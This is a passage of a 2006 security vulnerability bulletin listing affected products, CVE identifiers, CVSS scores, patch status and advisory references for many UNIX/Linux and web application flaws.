FEDORA-2005-320, April 15, 2005

Fedora Update Notifications,
FEDORA-2005-
550 & 551,
July 12, 2005

RedHat Security Advisory, RHSA-2005:361-19, October 5, 2005

RedHat Security Advisory, RHSA-2006:0117-7, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

RedHat

RedHat initscripts 7.93.24, Enterprise Linux WS 4, ES 4, AS 4m Desktop 4.0

A vulnerability has been reported when the 'sbin/service' command is run due to an error when handling certain variables, which could let a malicious user obtain elevated privileges.

Updates available

SGI

Currently we are not aware of any exploits for this vulnerability.

Red Hat Initscripts Elevated Privileges

CVE-2005-3629

7

RedHat Security Advisory, RHSA-2006:0016-18, March 7, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Samba.org

Samba 3.0.21, a-c

A vulnerability has been reported because the 'winbindd' daemon saves the machine trust account credentials to world-readable winbind log files in clear text, which could let a malicious user obtain sensitive information.

Patches available

Fedora

Trustix

There is no exploit code required.

Samba Machine Trust Account Information Disclosure

CVE-2006-1059

1.6

Secunia Advisory: SA19455, March 30, 2006

Trustix Secure Linux Security Advisory #2006-0018, April 4, 2006

Sendmail Consortium

Sendmail prior to 8.13.6

A vulnerability has been reported due to a race condition caused by the improper handling of
asynchronous signals, which could let a remote malicious user execute arbitrary code.

Updates available

RHSA-2006:0264-8

RHSA-2006:0265-9

Fedora

Gentoo

AIX

Sun

SuSE

FreeBSD

Slackware

OpenBSD

Avaya

Debian

HP

NetBSD

SGI

F-Secure

SGI

A Proof of Concept exploit script, sendtest.c, has been published.

Sendmail Asynchronous Signal Handling Remote Code Execution

CVE-2006-0058

8

Internet Security Systems Protection Advisory, March 22, 2006

Technical Cyber Security Alert TA06-081A

US-CERT VU#834865

RedHat Security Advisories, RHSA-2006:0264-8 & RHSA-2006:0265-9, March 22, 2006

Sun(sm) Alert Notification
Sun Alert ID: 102262, March 24, 2006

Gentoo Linux Security Advisory, GLSA 200603-21, March 22, 2006

SUSE Security Announcement, SUSE-SA:2006:017, March 22, 2006

FreeBSD Security Advisory, FreeBSD-SA-06:13, March 22, 2006

Slackware Security Advisory, SSA:2006-081-01, March 22, 2006

Avaya Security Advisory, ASA-2006-074, March 24, 2006

Debian Security Advisory,
DSA-1015-1, March 24, 2006

HP Security Bulletin,
HPSBUX02108, March 27, 2006

NetBSD Security Advisory, /NetBSD-SA2006-010, March 28, 2006

SGI Security Advisory, 20060302-01-P, March 22, 2006

F-Secure Security Bulletin, FSC-2006-2, March 28, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

storeBackup

storeBackup 1.18-1.18.4

A vulnerability has been reported due to the insecure creation of temporary files, which could let a malicious user obtain sensitive information.

Upgrades available

SUSE

Debian

There is no exploit code required.

StoreBackup Insecure Temporary File Creation

CVE-2005-3146
CVE-2005-3147
CVE-2005-3148

2.3
(CVE-2005-3146)

2.3
(CVE-2005-3147)

5.6
(CVE-2005-3148)

Security Focus, Bugtraq ID: 14985, September 30, 2005

SUSE Security Summary Report,
SUSE-SR:2005:021, September 30, 2005

Debian Security Advisory,
DSA-1022-1, April 4, 2006

Sun Microsystems, Inc.

Solaris 9.0 _x86, 9.0, 8.0 _x86, 8.0,
Sun Cluster 3.1 4/04

A vulnerability has been reported in the SunPlex Manager GUI due to an unspecified error, which could let a malicious user obtain sensitive information.

Update information

There is no exploit code required.

Sun Cluster SunPlex Manager Information Disclosure

CVE-2006-1601

1 Sun(sm) Alert Notification
Sun Alert ID: 102278, March 29, 2006

The Open Group

Open Motif 2.2.3

Two buffer overflow vulnerabilities have been reported in libUil (User Interface Language): a buffer overflow vulnerability was reported in 'diag_issue_diagnostic()' due to the use of the vsprintf() libc procedure, which could let a remote malicious user execute arbitrary code; and a vulnerability was reported in 'open_source_
file()' due to the use of the strcpy() libc procedure, which could let a remote malicious user execute arbitrary code.

Gentoo

RedHat

Currently we are not aware of any exploits for these vulnerabilities.

Open Motif libUil Buffer Overflows

CVE-2005-3964

Security Focus, Bugtraq ID: 15678, December 2, 2005

Gentoo Linux Security Advisory, GLSA 200512-16, December 28, 2005

Red Hat Security Advisory, RHSA-2006:0272-01, April 4, 2006

xine

xine-lib 1.1.1

A buffer overflow vulnerability has been reported when processing a malformed MPEG stream due to a failure to properly bounds check user-supplied input data prior to copying it to an insufficiently-sized memory buffer, which could let a remote malicious user execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, xinelib_poc.pl, has been published.

Xine-Lib Malformed MPEG Stream Buffer Overflow
Not Available Security Focus, Bugtraq ID: 17370, April 4, 2006
Multiple Operating Systems - Windows/UNIX/Linux/Other
Vendor & Software Name
Description

Common Name

CVSS
Resources

3dsrc.com

MonAlbum 0.8.7

SQL injection vulnerabilities have been reported in 'image_agrandir.php' due to insufficient sanitization of the 'pnom' and 'pcourriel' parameters and in 'index.php' due to insufficient sanitization of the 'pc' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

MonAlbum SQL Injection

CVE-2006-1585

4.7 Secunia Advisory: SA19503, April 3, 2006

AngelineCMS

AngelineCMS 0.8.1

A file include vulnerability has been reported in 'Loadkernel.PHP' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, angelineCMS.pl, has been published.

AngelineCMS Remote File Include

CVE-2006-1653

Not Available Security Focus, Bugtraq ID: 17371, April 4, 2006

Apache Software Foundation

libapreq2 2.0.6

A remote Denial of Service vulnerability has been reported due to errors in the 'apreq_parse_
headers()' and 'apreq_parse_
urlencoded()' functions.

Update available

Debian

DSA 1000-2

Currently we are not aware of any exploits for this vulnerability.

Apache Libapreq2 Remote Denial of Service

CVE-2006-0042

2.3

Security Focus, Bugtraq ID: 16710, February 17, 2006

Debian Security Advisory,
DSA-1000-1, March 14, 2006

Debian Security Advisory, DSA 1000-2, April 3, 2006

Apache Software Foundation

Struts prior to 1.2.9

Multiple vulnerabilities have been reported: a vulnerability was reported in 'RequestProcessor' because all actions can be cancelled, which could let a remote malicious user bypass security restrictions; a remote Denial of Service vulnerability was reported in 'ActionForm' because the public method 'getMultipartRequest
Handler()' gives access to elements in 'CommonsMultipart
RequestHandler' and 'BeanUtils;' and a vulnerability was reported in 'LookupDispatchAction' due to insufficient sanitization, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerabilities can be exploited through a web client.

Apache Struts Multiple Vulnerabilities

CVE-2006-1546
CVE-2006-1547
CVE-2006-1548

7
(CVE-2006-1546)

3.3
(CVE-2006-1547)

2.3
(CVE-2006-1548)

Security Focus, Security Tracker Alert ID: 1015856, April 1, 2006

aphpkb

aphpkb 0.57

Multiple Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of user-supplied input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Andy's PHP Knowledgebase Multiple Cross-Site Scripting

CVE-2006-1438

7 Security Focus, Bugtraq ID: 17377, March 27, 2006

Arab Portal

Arab Portal 2.0.1 Stable

Multiple input-validation vulnerabilities have been reported including Cross-Site Scripting and SQL injection, which could let a remote malicious user execute arbitrary HTML, script code, and SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

ArabPortal Multiple Input Validation
  Security Focus, Bugtraq ID: 17375, April 4, 2006

aWeb Labs

aWebBB 1.2

Several vulnerabilities have been reported: Cross-Site Scripting vulnerabilities were reported in 'post.php' due to insufficient sanitization of the 'tname' and 'fpost' parameters, in 'editac.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' 'country,' 'sig,' and 'otherav' parameters, and in 'register.php' due to insufficient sanitization of the 'fullname,' 'emailadd,' and 'country' parameters, which could let a remote malicious user execute arbitrary HTML and script code; and SQL injection vulnerabilities were reported in 'accounts.php,' 'changep.php,' 'editac.php,' 'feedback.php,' 'fpass.php,' 'login.php,' 'post.php,' 'reply.php,' and reply_log.php' due to insufficient sanitization of the 'username' parameter, in 'dpost.php' due to insufficient sanitization of the 'p' parameter, in 'ndis.php' and 'list.php' due to insufficient sanitization of the 'c' parameter, and in 'search.php' due to insufficient sanitization of the 'q' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through use of a web client.

AWebBB Multiple Input Validation

CVE-2006-1637
CVE-2006-1638

2.3
(CVE-2006-1637)

1.9
(CVE-2006-1638)

Secunia Advisory: SA19486, April 3, 2006

Barracuda Networks

Barracuda Spam Firewall with firmware prior to 3.3.03.022 and with spamdef prior to 3.0.10045

Several buffer overflow vulnerabilities have been reported: a buffer overflow vulnerability was reported when a remote malicious user submits email that contains a specially crafted LHA archive with a long filename, which could lead to the execution of arbitrary code; and a buffer overflow vulnerability was reported when a remote malicious user submits an email that contains a specially crafted ZOO archive, which could lead to the execution of arbitrary code.

Update to firmware version 3.3.03.022.

Currently we are not aware of any exploits for these vulnerabilities.

Barracuda Spam Firewall Buffer Overflows

CVE-2004-0234
CVE-2006-0855

10
(CVE-2004-0234)

3.9
(CVE-2006-0855)

Security Tracker Alert ID: 1015866, April 4, 2006

BASE Basic Analysis and Security Engine

BASE Basic Analysis and Security Engine 1.2-1.2.2

A vulnerability has been reported in 'base_maintenance.php' due to an unspecified error, which could let a remote malicious user bypass authentication mechanisms.

Updates available

Vulnerability could be exploited with a web client.

Basic Analysis and Security Engine Authentication Bypass

CVE-2006-1505

2.3 Secunia Advisory: SA19510, April 3, 2006

Cisco Systems

CSS11500 Content Services Switch 7.30 (00.09)S, 7.30 (00.08)S, 7.20 (03.10)S, 7.20 (03.09)S, 7.10 (05.07)S, 7.5, 7.4, CSS11500 Content Services Switch

A remote Denial of Service vulnerability has been reported in the HTTP compression functionality

Workaround information

Currently we are not aware of any exploits for this vulnerability.

Cisco 11500 Content Services Switch Remote Denial of Service

CVE-2006-1631

2.3 Cisco Security Advisory, cisco-sa-20060405, April 5, 2006

Claroline

Claroline 1.7.4, 1.7.2, 1.6, rc1, beta, 1.5.4, 1.5.3, 1.5

Multiple vulnerabilities have been reported: a Directory Traversal vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before using to view files, which could let a remote malicious user obtain sensitive information; a Cross-Site Scripting vulnerability was reported in 'rqmkhtml.php' due to insufficient sanitization of the 'file' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code; and a file include vulnerability was reported in 'claroline/
learnPath/include/
scormExport.inc.php' due to insufficient verification of the 'includePath' before using to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client; however, Proof of Concept exploit scripts, claroline-1.7.4-remote-and
-local-file-include.php and claroline_174_incl_xpl.html, have been published.

Claroline Multiple Vulnerabilities

CVE-2006-1594
CVE-2006-1595
CVE-2006-1596

7
(CVE-2006-1594)

2.3
(CVE-2006-1595)

4.9
(CVE-2006-1596)

Secunia Advisory: SA19461, April 3, 2006

CzarNews

CzarNews 1.14

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'news.php' due to insufficient sanitization of the 'email' parameter, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'cn_auth.php' due to insufficient sanitization of the 'usern' and 'passw' parameters, in 'news.php' due to insufficient sanitization of the 's' parameter, and in 'dpost.php' due to insufficient sanitization of the 'a' parameter, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities could be exploited with a web client.

CzarNews Script Insertion & SQL Injection

CVE-2006-1640
CVE-2006-1641

2.3
(CVE-2006-1640)

 

Secunia Advisory: SA19541, April 5, 2006

dbbs.sup.fr

DbbS 2.0-alpha & prior

An SQL injection vulnerability has been reported in 'topics.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

DbbS SQL Injection

CVE-2006-1579

7 Security Focus, Bugtraq ID: 17338, March 31, 2006
DIA

DIA 0.87-0.94

Multiple remote buffer overflow vulnerabilities have been reported due to a failure to properly bounds-check user-supplied input before copying it into insufficiently sized memory buffers, which could let a remote malicious user execute arbitrary code.

The vendor has released version 0.95-pre6, along with a patch for 0.94 to address these issues.

Mandriva

Ubuntu

Fedora

Debian

Currently we are not aware of any exploits for these vulnerabilities.

DIA XFIG File Import Multiple Remote Buffer Overflows

CVE-2006-1550

5.6

Security Focus, Bugtraq ID: 17310, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:062, April 3, 2006

Debian Security Advisory,
DSA-1025-1, April 6, 2006

Esqlane
lapse

Esqlanelapse 2.2, 2.0

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

Vulnerability could be exploited with a web client.

Esqlanelapse Cross-Site Scripting

CVE-2006-1570

2.3 Security Focus, Bugtraq ID: 17331, April 1, 2006

Exponent

Exponent CMS prior to 0.96.5 RC 1

Vulnerabilities have been reported in the banner module and image functionality due to unspecified input validation errors, which could let a remote malicious user execute arbitrary PHP code.

The vendor has released version 0.96.5-RC1 to address this issue.

Vulnerabilities can be exploited through a web client.

Exponent CMS Arbitrary Script Execution

CVE-2006-1604
CVE-2006-1605
CVE-2006-1606
CVE-2006-1607

7
(CVE-2006-1604)

7
(CVE-2006-1605)

2.3
(CVE-2006-1606)

7
(CVE-2006-1607)

Security Focus, Bugtraq ID: 17357, April 3, 2006

Fred Scalliet

Blank'N'Berg 0.2

Several vulnerabilities have been reported: a Directory Traversal vulnerability was reported due to insufficient validation of the '_path' parameter, which could let a remote malicious user obtain sensitive information; and a Cross-Site Scripting vulnerability was reported in 'index.php' due to insufficient sanitization of the '_path' parameter before displaying, which could let a remote malicious user execute arbitrary code.

No workaround or patch available at time of publishing.

Vulnerabilities may be exploited with a web client; however, Proof of Concept exploits have been published.

Blank'N'Berg Directory Traversal & Cross-Site Scripting

CVE-2006-1581
CVE-2006-1582

4.7
(CVE-2006-1581)

4.7
(CVE-2006-1582)

Security Tracker Alert ID: 1015854, March 31, 2006

gtd-php

gtd-php 0.5

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of input passed to various fields in 'newProject.php,' 'newList.php,' 'newWaitingOn.php,' newChecklist.php,' 'newContext.php,' 'newCategory.php,' and 'newGoal.php' before using, which could let a remote malicious user execute arbitrary HTML and script code; and a Script Insertion vulnerability was reported due to insufficient sanitization of the 'listTItle' parameter in 'listReport.php,' in 'projectReport.php' due to insufficient sanitization of the 'projectName' parameter, and in 'checklistReport.php' due to insufficient sanitization of the 'checklistTitle' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited via a web client.

gtd-php Cross-Site Scripting & Script Insertion

CVE-2006-1479

2.3 Secunia Advisory: SA19512, April 3, 2006

Hitachi

Groupmax World Wide Web 2.x, 3.x, World Wide Web Desktop 5.x, 6.x, World Wide Web Desktop for Jichitai 6.x,World Wide Web Desktop for Scheduler 5.x, World Wide Web for Scheduler 2.x, 3.x

A Cross-Site Scripting vulnerability has been reported due to insufficient sanitization of unspecified parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

Update information

Vulnerability can be exploited through a web client.

Hitachi Groupmax World Wide Web Cross-Site Scripting

CVE-2006-1574

4.7 Hitachi Security Advisory, HS06-005, March 31, 2006

Horde

Horde 3.0-3.0.9, 3.1

A vulnerability has been reported in Help Viewer which could let a remote malicious user execute arbitrary PHP code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

Horde Help Viewer Remote PHP Code Execution

CVE-2006-1491

7

Security Focus, Bugtraq ID: 17292, March 29, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Interact

Interact 2.1, 2.1.1

Multiple vulnerabilities have been reported: a vulnerability was reported in the 'login.php' script because different error responses are returned depending on whether the username is valid or invalid, which could let a remote malicious user obtain sensitive information; a vulnerability was reported due to insufficient sanitization of the 'search_terms' parameter in 'search.php' and various fields when creating an account, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' due to insufficient sanitization of the 'user_name' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

Interact Multiple Vulnerabilities

CVE-2006-1642
CVE-2006-1643
CVE-2006-1644

Not Available Secunia Advisory: SA19488, April 5, 2006

ISPofEgypt

Site Man 0

An SQL injection vulnerability has been reported in 'admin_login.asp' due to insufficient sanitization of the 'txtpassword' parameter before using in a SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

SiteMan SQL Injection

CVE-2006-1586

7 Secunia Advisory: SA19500, April 3, 2006

Jaakko Keranen

Doomsday Engine 1.9, 1.8.6

Format string vulnerabilities have been reported in the 'Con_Message()' and 'conPrintf()' functions when connecting to port 13209/tcp and passing a specially crafted JOIN command, which could let a remote malicious user cause a Denial of Service or execute arbitrary code.

Gentoo

Vulnerabilities can be exploited through use of a web client; however, a Proof of Concept exploit has been published.

Doomsday Engine Format Strings

CVE-2006-1618

7

 

Security Tracker Alert ID: 1015860, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-05, April 6, 2006

KGB

KGB Archiver 1.1.5 21

A Directory Traversal vulnerability has been reported when decompressing archives due to an input validation error, which could let a remote malicious user obtain sensitive information.

Update available

There is no exploit code required.

KGB Archiver Directory Traversal

CVE-2006-1611

2.3 Secunia Advisory: SA19511, April 3, 2006

lucidCMS

lucidCMS 2.0.0 RC4

Cross-Site Scripting vulnerabilities have been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

LucidCMS Cross-Site Scripting

CVE-2006-1634
CVE-2006-1635

2.3
(CVE-2006-1634)

2.3
(CVE-2006-1635)

Security Focus, Bugtraq ID: 17360, April 3, 2006

Mantis

Mantis 1.0.1, 1.0.0rc5 & prior

Cross-Site Scripting vulnerabilities have been reported in 'view_all_set.php' due to insufficient sanitization of the 'start_day,' 'start_year,' and 'start_month' parameters before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

Mantis Cross-Site Scripting

CVE-2006-1577

7 Security Focus, Bugtraq ID: 17326, March 31, 2006

mediaslash.
com

MediaSlash Gallery 0

A file include vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

MediaSlash Gallery Remote File Include

CVE-2006-1573

7 Security Focus, Bugtraq ID: 17323, March 30, 2006

MyBB Group

MyBulletinBoard 1.10

An HTML injection vulnerability has been reported due to insufficient sanitization of the 'email' BBcode tag when posting a message, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited via a web client.

MyBulletinBoard Email HTML Injection

CVE-2006-1625

7 Security Focus, Bugtraq ID: 17368, April 4, 2006

MySQL AB

MySQL 5.0.18

A vulnerability has been reported when handling query logging due to a discrepancy between the handling of NULL bytes in input data, which could let a remote malicious user bypass certain security restrictions.

Mandriva

A Proof of Concept exploit has been published.

MySQL Query Logging Bypass

CVE-2006-0903

4.9

Security Focus, Bugtraq ID: 16850, February 27, 2006

Mandriva Security Advisory, MDKSA-2006:064, April 3, 2006

NetBSD

NetBSD 3.0, 2.1, 2.0-2.0.3, 1.6-1.6.2

A vulnerability has been reported in 'If_Bridge(4)' because used stack memory is not zero out by IOCTL calls, which could let a malicious user obtain sensitive information.

Patches available

Currently we are not aware of any exploits for this vulnerability.

NetBSD Information Disclosure

CVE-2006-1588

1.6 NetBSD Security Advisory, NetBSD-SA2006-005, March 30, 2006

NetBSD

NetBSD 1.x

A vulnerability has been reported because the 'mail' program creates records with insecure permissions when the 'set record' setting is present in a user's .mailrc and the default umask is set, which could let a malicious user obtain sensitive information.

Patch information

Currently we are not aware of any exploits for this vulnerability.

NetBSD mail(1) Insecure File Permissions

CVE-2006-1587

1.6 NetBSD Security Advisory, NetBSD-SA2006-007, March 30, 2006

o2php.com

Oxygen 1.1-1.1.3

An SQL injection vulnerability has been reported in 'post.php' due to insufficient sanitization of the 'fid' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit has been published.

Oxygen SQL Injection

CVE-2006-1572

2.3 Secunia Advisory: SA19481, March 31, 2006

PHP Group

PHP 4.3.x, 4.4.x, 5.0.x, 5.1.x

A vulnerability has been reported in the 'html_entity_decode()' function because it is not binary safe, which could let a remote malicious user obtain sensitive information.

The vulnerability has been fixed in the CVS repository and in version 5.1.3-RC1.

Mandriva

There is no exploit code required; however, a Proof of Concept exploit has been published.

PHP Information Disclosure

CVE-2006-1490

2.3

Secunia Advisory: SA19383, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:063, April 2, 2006

phpBB Group

phpBB 2.0.19

A Cross-Site Scripting vulnerability has been reported in 'profile.php' due to insufficient sanitization of the 'cur_password' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through use of a web client.

phpBB Cross-Site Scripting

CVE-2006-1603

2.3 Secunia Advisory: SA19494, April 3, 2006

phpMyChat

phpMyChat 0.14.5, 0.14.4

An SQL injection vulnerability has been reported in 'MessagesL.PHP3' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, phpMyChat_0.14.5_
SQLINJ.php, has been published.

PHPMyChat SQL Injection
Not Available Security Focus, Bugtraq ID: 17382, April 5, 2006

PHPNuke-Clan

PHPNuke-Clan 3.0.1

A file include vulnerability has been reported in 'modules/vWar_account/
includes/functions_
common.php' due to insufficient verification of the 'vwar_root' parameter before using to include files, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, an exploit script, pnc.pl.txt, has been published.

PHPNuke-Clan Remote File Include

CVE-2006-1602

7 Security Focus, Bugtraq ID: 17356, April 3, 2006

PHPSelect

Submit-A-Link 0

An HTML injection vulnerability has been reported in 'index.php' due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, Proof of Concept exploit scripts, linksubmit_poc.pl and linksubmit.txt, have been published.

PHPSelect Submit-A-Link HTML Injection

CVE-2006-1622

7 Security Focus, Bugtraq ID: 17348, April 1, 2006

r2xDesign

qliteNews 2005.07.01

An SQL injection vulnerability has been reported in 'loginprocess.php' due to insufficient sanitization of the 'username' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

qliteNews SQL Injection

CVE-2006-1571

5.6 Secunia Advisory: SA19476, March 31, 2006

redcms.
co.uk

RedCMS 0.1

Several vulnerabilities have been reported: a script insertion vulnerability was reported in 'register.php' due to insufficient sanitization of the 'Email,' 'Location,' and "website' fields before storing in a member's profile, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'login.php' and 'register.php' due to insufficient sanitization of the 'username' parameter and in 'profile.php' due to insufficient sanitization of the 'u' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

RedCMS SQL Injection & Script Insertion

CVE-2006-1568
CVE-2006-1569

5.6
(CVE-2006-1568)

5.6
(CVE-2006-1569)

Secunia Advisory: SA19475, March 31, 2006

Reload
CMS

ReloadCMS 1.2.5

A vulnerability has been reported due to insufficient sanitization of the 'User-Agent' header field in an HTTP request before displaying, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

There is no exploit code required; however, a Proof of Concept exploit script, reloadcms_poc, has been published.

ReloadCMS HTML Injection

CVE-2006-1645

Not Available Security Focus, Bugtraq ID: 17353, April 2, 2006

SkinTech

X-Changer 0.2

SQL injection vulnerabilities have been reported in 'index.php' due to insufficient sanitization of the 'from,' 'into,' and 'id' parameters before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, a Proof of Concept exploit has been published.

X-Changer SQL Injection

CVE-2006-1557

7 Secunia Advisory: SA19459, March 31, 2006

SoftBiz

Image Gallery 0

Multiple SQL injection vulnerabilities have been reported due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

Softbiz Image Gallery Multiple SQL Injection
Not Available Security Focus, Bugtraq ID: 17339, March 31, 2006

v-creator.com

v-creator prior to 1.3-pre3

A vulnerability has been reported in 'VCEngine.php' due to an input validation error in the 'enrypt()' and 'decrypt()' functions, which could let a remote malicious user execute arbitrary shell commands.

Vulnerability has been fixed in version 1.3-pre3.

Vulnerability can be exploited via a web client.

V-creator Remote Shell Code Execution

CVE-2006-1599

7 Security Focus, Bugtraq ID: 17328, April 3, 2006

vscripts.pl

QLnews 1.2

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autorx' and 'newsx' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in 'admin.php' due to insufficient sanitization of input passed to configuration parameters before storing in 'config.php' which could let a remote malicious user execute arbitrary php code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited with a web client.

QLnews Multiple Input Validation

CVE-2006-1575
CVE-2006-1576

7
(CVE-2006-1575)

7
(CVE-2006-1576)

Security Focus, Bugtraq ID: 17335, April 3, 2006

vscripts.pl

VBook 2.0

Multiple vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'autor,' 'email,' 'www,' 'temat,' and 'tresc' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported in 'index.php' due to insufficient sanitization of the 'x' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported in 'config.php' due to insufficient sanitization of configuration parameters in 'admin.php' before storing, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VBook Input Validation

CVE-2006-1561
CVE-2006-1562
CVE-2006-1563

5.6
(CVE-2006-1561)

7
(CVE-2006-1562)

8
(CVE-2006-1563)

Secunia Advisory: SA19448, March 30, 2006

vscripts.pl

VNews 1.2

Multiple vulnerabilities have been reported: an SQL injection vulnerability was reported in 'admin/admin.php' due to insufficient sanitization of the 'loginvar' parameter, in 'news.php' due to insufficient sanitization of the 'news' parameter, and in 'news.php' due to insufficient sanitization of the 'nom' parameter, which could let a remote malicious user execute arbitrary SQL code; a Cross-Site Scripting vulnerability was reported in 'news.php' due to insufficient sanitization of the 'autorkomentarza' and 'tresckomentarza' parameters before using, which could let a remote malicious user execute arbitrary HTML and script code; and a vulnerability was reported in the administration section when editing variables in 'admin/config.php' before storing, which could let a remote malicious user arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

VNews Multiple Input Validation

CVE-2006-1543
CVE-2006-1544
CVE-2006-1545

7
(CVE-2006-1543)

2.3
(CVE-2006-1544)

6
(CVE-2006-1545)

Secunia Advisory: SA19435, March 30, 2006

VWar

VWar 1.3-1.5

A file include vulnerability was reported in 'get_header.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_R12.pl, has been published.

VWar Remote File Include

CVE-2006-1636

7 Security Focus, Bugtraq ID: 17358, April 3, 2006

VWar

VWar 1.5 & prior

A file include vulnerability has been reported in 'include/
functions_install.PHP' due to insufficient verification if the 'vwar_root' parameter before using to include files, which could let a remote malicious user execute arbitrary PHP code.

Updates available

Vulnerability can be exploited through a web client; however, a Proof of Concept exploit script, VWar_1.5.0_RCE.php, has been published.

Virtual War File Inclusion

CVE-2006-1503

5.6

Secunia Advisory: SA19438, March 29, 2006

Secunia Advisory: SA19438, April 4, 2006

WebAPP

WebAPP 0.9.9 .3.2

Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of unspecified input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

WebAPP Cross-Site Scripting

CVE-2006-1427

2.3

Secunia Advisory: SA19506, April 3, 2006

Websina

Bugzero 4.3.1

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'msg' parameter in various scripts and in 'edit.jsp' due to insufficient sanitization of the 'entryld' parameter, which could let a remote malicious user execute arbitrary HTML and script code; and a Cross-Site Scripting vulnerability was reported in 'edit.jsp' due to insufficient sanitization of the 'projectld' parameter and in 'error.jsp' due to insufficient sanitization of the 'error' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

